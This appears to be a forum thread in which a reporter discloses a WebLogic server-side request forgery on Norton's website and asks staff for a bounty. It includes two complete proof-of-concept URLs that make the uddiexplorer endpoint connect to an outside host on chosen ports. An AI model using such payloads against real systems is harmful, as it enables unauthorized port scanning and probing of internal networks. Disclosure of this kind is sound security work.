hey admin i have tried both open and close ports and found that the webserver of Norton is vulnerable to WebLogic Server Side Request Forgery as i have tried both open and closed port of website and it is found vulnerable.
Open Port No error (https://us.norton.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://bxss.me:80&rdoSearch=name&txtSearchname=GD_ATTACKER&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search)
Closed Port error Found (https://us.norton.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://bxss.me:23&rdoSearch=name&txtSearchname=GD_ATTACKER&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search)
Hi @GD ATTACKER - thanks for the information. Our team has reviewed it and taken action. We appreciate your feedback. A team member will be contacting you shortly. Thanks.
ahh ok i hope i get a positive reply soon
Depends how soon a Symantec employee is able to respond.
ahh ok so how much time they take for that
Symantec may contact you for more details.
they improved that flow but I need proper fund or kudos for my efforts
what u mean
hey but why no bounty and no kudos for me i reported that
doubly
Symantec has been notified.